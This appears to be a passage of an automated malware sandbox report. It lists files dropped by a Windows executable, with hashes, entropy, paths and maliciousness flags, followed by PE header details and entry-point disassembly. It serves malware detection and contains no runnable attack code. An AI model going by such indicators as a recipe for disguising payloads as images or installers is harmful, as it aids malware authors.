                                                                                                              SSDEEP:98304:GIusCrIENkeXPV97kqmCf4P48E37aREUXr7VYyUOhez2IlpmURniNmJ:Xngv7NmCAPLTREQVb8/RomJ
                                                                                                              MD5:70C21DA900796B279A09040B00953E40
                                                                                                              SHA1:7CD3690B1FDDE033CD47E657FC4FC3A423DF716F
                                                                                                              SHA-256:901330243EF0F7F0AAE4F610693DA751873E5B632E5F39B98E3DB64859D78CBC
                                                                                                              SHA-512:851F4ED843F5D47C93D6C5A7D1895A674B6448631B567A0CCB2DF5873E4A5E722F28ECFC4D0D3220A86309481F9793FCDDA4F89BD993FB79CD09DBED29423752
                                                                                                              Malicious:true
                                                                                                              Process:C:\Users\user\Desktop\2976587-987347589.07.exe
                                                                                                              File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                                                                              Category:dropped
                                                                                                              Size (bytes):10681
                                                                                                              Entropy (8bit):7.866148090449211
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:fN3El4oBtN9pmD65VoeotpeGy/nmgVtKFbM/PvMZ5ZWtZl4EehHGXI9Fch5:fN3E7NW27oJWJ+M/8ZCDuEe2I9FS5
                                                                                                              MD5:10A818386411EE834D99AE6B7B68BE71
                                                                                                              SHA1:27644B42B02F00E772DCCB8D3E5C6976C4A02386
                                                                                                              SHA-256:7545AC54F4BDFE8A9A271D30A233F8717CA692A6797CA775DE1B7D3EAAB1E066
                                                                                                              SHA-512:BDC5F1C9A78CA677D8B7AFA2C2F0DE95337C5850F794B66D42CAE6641EF1F8D24D0F0E98D295F35E71EBE60760AD17DA1F682472D7E4F61613441119484EFB8F
                                                                                                              Malicious:false
                                                                                                              Process:C:\Users\user\Documents\l0tiFM.exe
                                                                                                              File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                                              Category:dropped
                                                                                                              Size (bytes):37274
                                                                                                              Entropy (8bit):7.991781062764932
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:768:6uBASoT9gu8yCOpS/DCNuoaa7SOjrX+ACdA7EtGKDRklnvga371DNpnN7s:fGSfyxENa7ZCRtxylnvgAVNI
                                                                                                              MD5:6D4DEB9526F3973DE0F9DCE9392F8EA7
                                                                                                              SHA1:520128FB9BAB7064BEA992E4427B924073E58C0E
                                                                                                              SHA-256:B415D73DC6CBEEE59736ADD1AF397B6982BDB2B3A9E994797EE6AF5979E58FD1
                                                                                                              SHA-512:F07E0DAEEE5C54BC8DB462630F46A339D9ED0AF346BAB113B4EC7FD2BC463AFC04CBD0FDFC8D9F54528B7127AA7735575A255B85F2D0B3CCD518FC5DC39BA447
                                                                                                              Malicious:true
                                                                                                              Process:C:\Users\user\Desktop\2976587-987347589.07.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):512
                                                                                                              Entropy (8bit):5.186642107139491
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:WcSRpdRdbCrCa2BIDR+syYWRudduXCCA7OdUzW9E40/qcX:URpiMBIDRNyYWRudduXCCigUzWg3
                                                                                                              MD5:A1CC6E3DD3069453BEF8913F9698C666
                                                                                                              SHA1:2A3E6F584700A78F1C1691238F9673CBCA8084FD
                                                                                                              SHA-256:4BF6D36A529FD1214D07E344298AF465AA7D764CA2BDBBA4B3D7C070B3CE25F9
                                                                                                              SHA-512:76A43622E6FDF6DE22F3EAC452F378C809FC28B84CA76774818BD8ACD9C2AC352085BE0F721B661978B0B98A4B87AEBC8C4ED6815C48FC271992094EE75BE57D
                                                                                                              Malicious:false
                                                                                                              Process:C:\Users\user\Documents\l0tiFM.exe
                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                                                                              Category:dropped
                                                                                                              Size (bytes):366410
                                                                                                              Entropy (8bit):7.375315637594966
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6144:XC/wwzn9iJzBFsJmUSmfXVz7pB+iMuVrt5DY:9ws7FsJmUSmd7pBpMgR58
                                                                                                              MD5:DA1D5EB665D3AAD523BE59415E6449ED
                                                                                                              SHA1:40C310E82035381410B83E4F1DA0A4410FEB8FE6
                                                                                                              SHA-256:F919634AC7E0877663FFF06EA9E430B530073D6E79EEE543D02331F4DFF64375
                                                                                                              SHA-512:6F179A166126C97444920636B584FB0BA4E9596A659921A2BCAA80E7DE094A87402D3E2B6D8DA8797045D7E22C3D37E6CED2A8E137E0387A1320D631B139FD36
                                                                                                              Malicious:false
                                                                                                              Process:C:\Users\user\Desktop\2976587-987347589.07.exe
                                                                                                              File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                                                                              Category:dropped
                                                                                                              Size (bytes):135589
                                                                                                              Entropy (8bit):7.995304392539578
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:3072:CQFCJFvegK8iS+UKaskx87eJd0Cn/zUR7Tq:CKwvehSbsY8anIde
                                                                                                              MD5:0DDD3F02B74B01D739C45956D8FD12B7
                                                                                                              SHA1:561836F6228E24180238DF9456707A2443C5795C
                                                                                                              SHA-256:2D3C7FBB4FBA459808F20FDC293CDC09951110302111526BC467F84A6F82F8F6
                                                                                                              SHA-512:0D6A7700FA1B8600CAE7163EFFCD35F97B73018ECB9A17821A690C179155199689D899F8DCAD9774F486C9F28F4D127BFCA47E6D88CC72FB2CDA32F7F3D90238
                                                                                                              Malicious:true
                                                                                                              Process:C:\Users\user\Desktop\2976587-987347589.07.exe
                                                                                                              File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                                                                              Category:dropped
                                                                                                              Size (bytes):3892010
                                                                                                              Entropy (8bit):7.995495589600101
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:98304:NAHrPzE9m4wgyNskyumYyryfxFVLqndnA1Nfjh:j5wgHh/nyZLN1
                                                                                                              MD5:E4E46F3980A9D799B1BD7FC408F488A3
                                                                                                              SHA1:977461A1885C7216E787E5B1E0C752DC2067733A
                                                                                                              SHA-256:6166EF3871E1952B05BCE5A08A1DB685E27BD83AF83B0F92AF20139DC81A4850
                                                                                                              SHA-512:9BF3B43D27685D59F6D5690C6CDEB5E1343F40B3739DDCACD265E1B4A5EFB2431102289E30734411DF4203121238867FDE178DA3760DA537BAF0DA07CC86FCB4
                                                                                                              Malicious:true
                                                                                                              Process:C:\Users\user\Documents\l0tiFM.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):879
                                                                                                              Entropy (8bit):4.5851931774575325
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:JRSscjAQ7F3Y+ZcRC60rdimzYFAQT7LE/o2xjC:fSscjHRY+ZcRAdimzo/OY
                                                                                                              MD5:E54C4296F011EC91D935AA353C936E34
                                                                                                              SHA1:53A3313D40696E87C9B8CE2BE7E67BE49DD34C20
                                                                                                              SHA-256:81FF16AEDF9C5225CE8A03C0608CC3EA417795D98345699F2C240A0D67C6C33D
                                                                                                              SHA-512:5D1FBA60BE82A33341E5B9E7D3C1E7B0DCC9A41B4C1F97F2930141A808D62AF56D8697CB0D2FD4894A6080DF98A3E4EEF9D98A6003C292C588F547E1C6F84DE1
                                                                                                              Malicious:false
                                                                                                              Process:C:\Users\user\Documents\l0tiFM.exe
                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                                                                              Category:dropped
                                                                                                              Size (bytes):55085
                                                                                                              Entropy (8bit):7.99273647746538
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:1536:puwkqL5y4p4KnRWlENc3PGdLLv/PJctIJPc+pifyC:kQM4+B/MLL/PmaG
                                                                                                              MD5:DC44AE348E6A74B3A74871020FDFAC74
                                                                                                              SHA1:B223020A5F82FF15FD5E4930477F38F34C9CB919
                                                                                                              SHA-256:48F258037BE0FFE663DA3BCD47DBA22094CC31940083D9E18A71882BDC1ECDB8
                                                                                                              SHA-512:5FB13A8CE2206119C76325504DEF61D4277A73D71D79157AE564F326D6FC18080218633CE7C708F31A81D6CD1A5AD8A903CFE1CC0C57183B4809A9C12E32A429
                                                                                                              Malicious:true
                                                                                                              Process:C:\Users\user\Desktop\2976587-987347589.07.exe
                                                                                                              File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                                                                              Category:dropped
                                                                                                              Size (bytes):125333
                                                                                                              Entropy (8bit):7.993522712936246
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:3072:8vcsO9vKcSrCpJigTY1mZzj283zsY+oOVoPj24pq:8vcXfSWT3TY1mZf13zB+a72Uq
                                                                                                              MD5:2CA9F4AB0970AA58989D66D9458F8701
                                                                                                              SHA1:FE5271A6D2EEBB8B3E8E9ECBA00D7FE16ABA7A5B
                                                                                                              SHA-256:5536F773A5F358F174026758FFAE165D3A94C9C6A29471385A46C1598CFB2AD4
                                                                                                              SHA-512:AB0EF92793407EFF3A5D427C6CB21FE73C59220A92E38EDEE3FAACB7FD4E0D43E9A1CF65135724686B1C6B5D37B8278800D102B0329614CB5478B9CECB5423C7
                                                                                                              Malicious:true
                                                                                                              Process:C:\Program Files (x86)\DfP1K3\DfP1K3.exe
                                                                                                              File Type:PNG image data, 2388 x 704, 8-bit/color RGBA, non-interlaced
                                                                                                              Category:dropped
                                                                                                              Size (bytes):486896
                                                                                                              Entropy (8bit):7.999649437186317
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:6144:oZ24zuaSbNyXS4pHuYgWOxuYPsE5qvujWt+wnlnRwF0RRbVYZ19dIH0zSUJs/AeC:h4zeauYgLPsZLJnRS+VYZ1Hg0zShxqZ
                                                                                                              MD5:8FB4D4B3DCE57A2C6F9FF2278B5BAE86
                                                                                                              SHA1:923840620D9A2464CA4BA9F6C3AC871370832797
                                                                                                              SHA-256:2DDE9D8EE2A40F5492C68BADCEF8D478C781A9502DB603F0F714310F29C3339F
                                                                                                              SHA-512:4DD30870F03B77CFA6F3DF360AB7EDAE8A98E996394BB39F771B7860228853F40885BF926EB585986B7639EA3D400A6B6A0F92986D756F9F8751A421638443CC
                                                                                                              Malicious:true
                                                                                                              Process:C:\Program Files (x86)\DfP1K3\DfP1K3.exe
                                                                                                              File Type:PNG image data, 2388 x 704, 8-bit/color RGBA, non-interlaced
                                                                                                              Category:dropped
                                                                                                              Size (bytes):57536
                                                                                                              Entropy (8bit):7.99718672166578
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:1536:tl/C97eWbmtpgNMVCmVlR2cPfX3Xwn7MQ68eUYriiz:fC9opgNazRDwgwiz
                                                                                                              MD5:9E285C23C9DA187B313051DD6FEB4266
                                                                                                              SHA1:71E3F791A947F0DCA9F304B94825ED591CE169BD
                                                                                                              SHA-256:E47E61463C164964EF47EE707C93DCBCA17861038D8BA7ABCCC853926BEA2FA7
                                                                                                              SHA-512:DBABCADF0E06196EF3CC473E2D31D6298F5F76C83C3B68E6139B77E0FDF64F547F573861C594FC7FD8D24CAF69DD39ED50AC1D5860F7520A5B0B4EF7EAC3FB4C
                                                                                                              Malicious:true
                                                                                                              Process:C:\Program Files (x86)\DfP1K3\DfP1K3.exe
                                                                                                              File Type:PNG image data, 2388 x 704, 8-bit/color RGBA, non-interlaced
                                                                                                              Category:dropped
                                                                                                              Size (bytes):357504
                                                                                                              Entropy (8bit):7.999473897820039
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:6144:PWBjlu8Tzg5uKKa+87hJG8Z2P6XhnRlKEOMUvykizQz+D:OplusDv4LG8BXRfsRid
                                                                                                              MD5:2977911419E268860C5E85E967E5C13E
                                                                                                              SHA1:4D9EE17F22C8B4207271E872C3B25910D9773A15
                                                                                                              SHA-256:405EEAB6A864C0DE19E5B929E7CBB235F7D734ACDD4330B4AE65B88AC238DAE9
                                                                                                              SHA-512:5BE7FC74FD795C63F8C3323E46961C1B0F2D9F4084CE417BE6D68153D93CA5CE90459EE8C83B3CEAEB4DE757A657DEAAC5979D0BBE01681368263B2CAA61F328
                                                                                                              Malicious:true
                                                                                                              Process:C:\Program Files (x86)\DfP1K3\DfP1K3.exe
                                                                                                              File Type:PNG image data, 2388 x 704, 8-bit/color RGBA, non-interlaced
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1589824
                                                                                                              Entropy (8bit):7.999900949539504
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:49152:ejDii8G+quo3pXoJXUK1q3EUNDi8oNH43m:e3PrVOf1q3tRq43m
                                                                                                              MD5:BA024D16008C2932005DB859C94476A8
                                                                                                              SHA1:9C832735CD7439BB82449EBCB41E240EFD51EA1E
                                                                                                              SHA-256:753920EE4FC22EBA98ACA6A6BF0C75BAC2E5145DE4316EBA4B78ABDA74A2C2D2
                                                                                                              SHA-512:9944E398921C71BC6FEC4BB957EABC1D0EAE40BDDB4BB6CE21D08EF60755F143D7B53248D3EB7C8D9B85214A152A42420ED153F4163A937DDB4EEF37A46D3B1B
                                                                                                              Malicious:true
                                                                                                              Process:C:\ProgramData\efk2JUeS\lBoqoqIC.exe
                                                                                                              File Type:PNG image data, 2388 x 704, 8-bit/color RGBA, non-interlaced
                                                                                                              Category:dropped
                                                                                                              Size (bytes):670784
                                                                                                              Entropy (8bit):7.999745526679517
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:12288:CvUww1DGO1GY2/SikOrH4HzLoBCC15wNnYcMUBwtYH4P:CHwtJET/j4/b6WnYcMUBT0
                                                                                                              MD5:06C2604A6B2E157543D6812D4F88D743
                                                                                                              SHA1:893512BF98154554EF2153D9DBA9700B6C99862B
                                                                                                              SHA-256:2C932C2DA7BB8F0435607F5FD362416A445A8765D06F57363D07FA5F3E0B0F6D
                                                                                                              SHA-512:03D2D76E4D3EA3FFFF4D304B0971B61FCDE2347C007BBAC3782304B9924893AAE6D3B909564B6ACC531E762015118B73DD7DA9027D39CB4D0D797ABE247F847E
                                                                                                              Malicious:true
                                                                                                              Process:C:\Users\user\Desktop\2976587-987347589.07.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):28272
                                                                                                              Entropy (8bit):7.7116374870274536
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:384:9RegCRh1vC6FvsdvaUv2rywX0IK+H8Ku7jVolZ7XRJsKYkGDfRRX5qSgUWCHopQa:O5F1FUdy422IK+gAZt2i0YPpQn4GMB
                                                                                                              MD5:6D793DEEE57502B69E89D0D15BEB4BD8
                                                                                                              SHA1:A0917DB78C9D20F89BBC19A889B5DD2E935AE19A
                                                                                                              SHA-256:5F4BEE97CECF66E48CC641C70A69A612B1CADFC1AEAFA9D382E384C7F2392BD0
                                                                                                              SHA-512:1DF06F9591CF8079156DB2E27BA803AD5909E36515116319C2275B1183609DC5BC03B52DB61B6666560128EF6D4CD28FFF0A87640815B0CC65954D977A60A899
                                                                                                              Malicious:false
                                                                                                              Process:C:\ProgramData\efk2JUeS\lBoqoqIC.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):339
                                                                                                              Entropy (8bit):5.275098541964511
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:qUKjyrW4mytt8G3s8Ad4yrW4+6AbKiCmxyrW4riSyrW4pWmcNVc3ayrW4keSp7xe:vayrW4ptF744yrW4+6BifxyrW4riSyrJ
                                                                                                              MD5:5C432F8D57873B6BE523443150D57215
                                                                                                              SHA1:A14369080CC64B7C04EF736AAE89620713CEFAD3
                                                                                                              SHA-256:29ED749E1A66FE95A21FBB5D2E81EFAB2CF30503159CA57E81FD6E73A894D062
                                                                                                              SHA-512:BDEB4DEEDA7856592D3F1A3EFB3B53F46A1AE8E79E03461BE7DFAC9B010C758517F18D18E2016F4E7DF241C75F077C2AE51981CF77F761EFC96075E1FB2903B7
                                                                                                              Malicious:false
                                                                                                              Preview:[01/10/2025 22:43:59] Success.Update started: C:\ProgramData\efk2JUeS\lBoqoqIC.exe..[01/10/2025 22:43:59] Notice.Update engine version: 3.8.0.0..[01/10/2025 22:43:59] Notice.Product: Xshell 6..[01/10/2025 22:43:59] Success.Language set: Primary = 9, Secondary = 2..[01/10/2025 22:43:59] Success.Include script: _TU20_Global_Functions.lua..
                                                                                                              Process:C:\ProgramData\efk2JUeS\lBoqoqIC.exe
                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 111x63, components 3
                                                                                                              Category:dropped
                                                                                                              Size (bytes):6887
                                                                                                              Entropy (8bit):7.912671939062537
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:EoK9OIJV7hREPQEOPdivlu54UovmNqg0aB0kOI:EXIIJVcPQEOEvMJoON/0aBwI
                                                                                                              MD5:A5E03F11616B2D7CD17079D60D461E58
                                                                                                              SHA1:C01BE1621610D881F5F25F6E255FA71E1A19404E
                                                                                                              SHA-256:B24E47D7EA726047EA52F2F7B819E64B1051D0FD852E2C616B978CE1C4F0D78F
                                                                                                              SHA-512:52D4958E188F29F7D189FE38F8A75A537101813D397AABAB907AAF436F0A52DDD5FBB49C33D32AAD7419063CC27DC2BF66C7EBBB6957575E857E35F03FE2D6AE
                                                                                                              Malicious:false
                                                                                                              Process:C:\ProgramData\efk2JUeS\lBoqoqIC.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8
                                                                                                              Entropy (8bit):1.2987949406953985
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:FQFSh:EE
                                                                                                              MD5:23EDFB2405AC2E4DB37311CE948238C6
                                                                                                              SHA1:F36D23E915DD9041E47D68D8B85B4477BCC9D732
                                                                                                              SHA-256:E7964E1E6157734CDAF7960EB2B8DD16AF6FBC93A1398DA089B2C1A143A5CA23
                                                                                                              SHA-512:C3549C73663C5079EEE776BEDFB31CEF1428392C30738FB0DD6657F39F902DCF8DAFBD23AD702A1EBFF697F719990C82D8B57A553086EB77C274305AA8725D2C
                                                                                                              Malicious:false
                                                                                                              Preview:555557ww
                                                                                                              Process:C:\ProgramData\efk2JUeS\lBoqoqIC.exe
                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 111x63, components 3
                                                                                                              Category:dropped
                                                                                                              Size (bytes):6887
                                                                                                              Entropy (8bit):7.9129099572321495
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:E1K9OIJV7hREPQEOPdivlu54UovmNqg0aB0kOI:EAIIJVcPQEOEvMJoON/0aBwI
                                                                                                              MD5:696DA2D86D01C352113E5CB64D817A1D
                                                                                                              SHA1:42D3C7C4894CF0E996930BAB162FE3A95C6A6A12
                                                                                                              SHA-256:1C649B1AC3AF7098FBE25D54B5381FB2B55A936108153175983601115F2A43EA
                                                                                                              SHA-512:676E493C27B67197896360A4AEE975BEDA0A713DF82D2B7B8CE1FCA430AA595476DDB129567EB0C87B096A734C82697C8231F26C2ED23867A843B25543FF5A08
                                                                                                              Malicious:false
                                                                                                              Process:C:\Users\user\Desktop\2976587-987347589.07.exe
                                                                                                              File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                                              Category:dropped
                                                                                                              Size (bytes):3889557
                                                                                                              Entropy (8bit):7.999938755105323
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:98304:bAnkiLOZS/hpXbdHpPcG59BO8NQXIeXXv5L4f2fN3yQWF+A:0ndLOZS/DtpPJRO8OHBL4f2UQI+A
                                                                                                              MD5:30D4B6263BAEB074C32D084176528538
                                                                                                              SHA1:52A8FEEF70196276FC8689BE21B24C9FC1AAFD3A
                                                                                                              SHA-256:14E0245991F532A7D3180F5AF1759DA83ABE00AFB009780012F6A714C696CE49
                                                                                                              SHA-512:09BD776F612BBF34CE85FF0098E651485B9F69A988176475C666133DDC28DC6AF875A67C5DDBB8D61A90AD1A97274C99BC4167028CE097BCB603770AEC120AA7
                                                                                                              Malicious:true
                                                                                                              Process:C:\Users\user\Desktop\2976587-987347589.07.exe
                                                                                                              File Type:GIF image data, version 89a, 10 x 10
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8228
                                                                                                              Entropy (8bit):7.9789770028772695
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:4Bue6hKvTlByz2GqpoPTgyXrByFCt4lXp9tyey2Q0l:4BuNhyTlBU2dp+1XrBuCgp9vU0l
                                                                                                              MD5:43FD3C42AFDF1FF2B9CADFFBF948E5F6
                                                                                                              SHA1:FBD3B3C28A4AABAE3E3003ACA90D5494B53F49A0
                                                                                                              SHA-256:7C6FBC6236EFAA28D4947DE161F77B628FECE2FD00E32F0635175993E1BC85A5
                                                                                                              SHA-512:0C947E731C4594F2357112846650A4399B667731A1CBACC77855D8C9C09A7A43B82515C31945ECA43157E4B02FFB7A0595C7406F3A614DFC17328580B603F0DA
                                                                                                              Malicious:false
                                                                                                              Process:C:\Users\user\Desktop\2976587-987347589.07.exe
                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):133136
                                                                                                              Entropy (8bit):6.350273548571922
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3072:NtmH5WKiSogv0HSCcTwk7ZaxbXq+d1ftrt+armpQowbFqD:NYZEHG0yfTPFas+dZZrL9MD
                                                                                                              MD5:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                                                                                              SHA1:6281A108C7077B198241159C632749EEC5E0ECA8
                                                                                                              SHA-256:D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
                                                                                                              SHA-512:625F46D37BCA0F2505F46D64E7706C27D6448B213FE8D675AD6DF1D994A87E9CEECD7FB0DEFF35FDDD87805074E3920444700F70B943FAB819770D66D9E6B7AB
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Process:C:\Users\user\Desktop\2976587-987347589.07.exe
                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):122880
                                                                                                              Entropy (8bit):6.002018823861582
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:Jd4E7qItA4nbQ0R3rh4Q8/0fp0uQ4S8S7YDLbnTPtrTzvesW7dj9dl4Cp52Fu:Jf7qG3Gyp0p4ZmGLbTPJT7y7aCp5gu
                                                                                                              MD5:96A06BC270468375262C53A19B7867F2
                                                                                                              SHA1:7772F3917B6DDB49F030AA8DDB0BB8B41B59884E
                                                                                                              SHA-256:5EFFCA21EA51FED35D248F38BBA33013A467366821CB1D967FDA2D01ECFB84FF
                                                                                                              SHA-512:D0A3F838659DE0E232E7A7A45058F0CE832EE15AC3ABD26524809429415F95D70F1D4C9A037095DAF5EF968CF55F3AC4D5DBF7E17EEA5EF9BB5EF82F2D91E6F4
                                                                                                              Malicious:true
                                                                                                              Process:C:\Users\user\Desktop\2976587-987347589.07.exe
                                                                                                              File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):28272
                                                                                                              Entropy (8bit):6.22864467650069
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:384:N3YUY30d1Kgf4AtcTmwZ/22a97C5ohYh3IB96Oys2+l0skiM0HMFrba8no0ceD/F:NOUkgfdZ9pRyv+uPzCMHo3q4tDghz
                                                                                                              MD5:68C76C673826CA79508DF2A2732F5D30
                                                                                                              SHA1:036D3B3BC235D40E752B80AB7A3BDEE2C5A96A93
                                                                                                              SHA-256:4CBFDAA298A3EDBFAB92C9F89590ED7F190F32954639EB781A08817807A2E845
                                                                                                              SHA-512:0A1026AFC244B91E7E2C32AB94B931634D8AA238069EA3D291F7EB2103223E773F47726ECC4D82A99EE9454114F38AD23286350062BCC42451FCF630DF2A181C
                                                                                                              Malicious:true
                                                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2
                                                                                                              Entropy (8bit):1.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:y:y
                                                                                                              MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                                                              SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                                                                              SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                                                              SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                                                              Malicious:false
                                                                                                              Preview:..
                                                                                                              Process:C:\Program Files (x86)\DfP1K3\DfP1K3.exe
                                                                                                              File Type:GLS_BINARY_LSB_FIRST
                                                                                                              Category:dropped
                                                                                                              Size (bytes):298
                                                                                                              Entropy (8bit):4.453229310328559
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:ri9Jfnvl//lll1siQg4d1ywsiQI5kZt8jtl/zi8tkHsl9/CEv2lWwwAUWKznllF8:ri9J9TwPYtyjtOsXmYwhoiqO
                                                                                                              MD5:DB67B99EBC519DE5995C39A41A271373
                                                                                                              SHA1:0626EAF7617E698C7F0269628FB4FA4A2A7AA54A
                                                                                                              SHA-256:F115D7470EE1DA41E33BAD7152A77CA07476745F3EA6D2627271304116C1FDCD
                                                                                                              SHA-512:042560117976DFC6EDA1388506AA7FD5A3425EE9562EE0F592389F5116FEA1515462B70930EDDF3E4B92092CE6FF8FD8DC4E9181CEB507DEBEC60ED1264ACDC7
                                                                                                              Malicious:false
                                                                                                              File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                              Entropy (8bit):0.0837008799425276
                                                                                                              TrID:
                                                                                                              • Win64 Executable GUI (202006/5) 92.65%
                                                                                                              • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                              • DOS Executable Generic (2002/1) 0.92%
                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                              File name:2976587-987347589.07.exe
                                                                                                              File size:30'887'936 bytes
                                                                                                              MD5:67ab54b4fc69f4175d217dd57154a27c
                                                                                                              SHA1:f753d5cf1dde05bd2b3417ddfcd12306219fdef3
                                                                                                              SHA256:898349755ad447054ca99dc779c1f5b6c1dd4a7c0dcf1dda1d0e8bbaa6406b36
                                                                                                              SHA512:00b2c238ad1aecd63fb73c7dc6616e198302fd3ee665696e59fe99d189853e115648df3360fe51d0399af304b375811ca546b465504b63d28ce3a2a84a2baf0b
                                                                                                              SSDEEP:3072:U54rQk5rIYRl8YLiVeUeqH+WEwugQyXY2YHFkc1e5evFBDwRucQyTvRBsmuB:q4rUKDLiVeUhEFeYHt1e5evDw/K
                                                                                                              TLSH:BF67AD1B77E070F9E1B69678C8125649D772B8331731AB9F03A44286DF376D18D3AB22
                                                                                                              Icon Hash:338ed4d4a2726922
                                                                                                              Entrypoint:0x140004988
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x140000000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                              DLL Characteristics:HIGH_ENTROPY_VA, TERMINAL_SERVER_AWARE
                                                                                                              Time Stamp:0x65574925 [Fri Nov 17 11:06:13 2023 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:6
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:6
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:6
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:0f7cdde37f1462484539e0138cfa1fe2
                                                                                                              Instruction
                                                                                                              dec eax
                                                                                                              sub esp, 28h
                                                                                                              call 00007F69D0700F48h
                                                                                                              dec eax
                                                                                                              add esp, 28h
                                                                                                              jmp 00007F69D06FD1B0h
                                                                                                              int3
                                                                                                              int3
                                                                                                              jmp 00007F69D07033F0h
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              inc eax
                                                                                                              push ebx
                                                                                                              dec eax
                                                                                                              sub esp, 20h
                                                                                                              dec eax
                                                                                                              mov ebx, ecx
                                                                                                              jmp 00007F69D0700AF3h
                                                                                                              dec eax
                                                                                                              mov ecx, ebx
                                                                                                              call 00007F69D07033F6h
                                                                                                              test eax, eax
                                                                                                              jne 00007F69D0700AE4h
                                                                                                              dec eax
                                                                                                              cmp ebx, FFFFFFFFh
                                                                                                              jne 00007F69D0700AD9h
                                                                                                              call 00007F69D0701457h
                                                                                                              jmp 00007F69D0700AD7h
                                                                                                              call 00007F69D0701430h
                                                                                                              dec eax
                                                                                                              mov ecx, ebx
                                                                                                              call 00007F69D070343Ch
                                                                                                              dec eax
                                                                                                              test eax, eax
                                                                                                              je 00007F69D0700AA7h
                                                                                                              dec eax
                                                                                                              add esp, 20h
                                                                                                              pop ebx
                                                                                                              ret
                                                                                                              inc eax
                                                                                                              push ebx
                                                                                                              dec eax
                                                                                                              sub esp, 20h
                                                                                                              dec eax
                                                                                                              mov ebx, ecx
                                                                                                              xor ecx, ecx
                                                                                                              call dword ptr [0000A6CFh]
                                                                                                              dec eax
                                                                                                              mov ecx, ebx
                                                                                                              call dword ptr [0000A6BEh]
                                                                                                              call dword ptr [0000A6C8h]
                                                                                                              dec eax
                                                                                                              mov ecx, eax
                                                                                                              mov edx, C0000409h
                                                                                                              dec eax
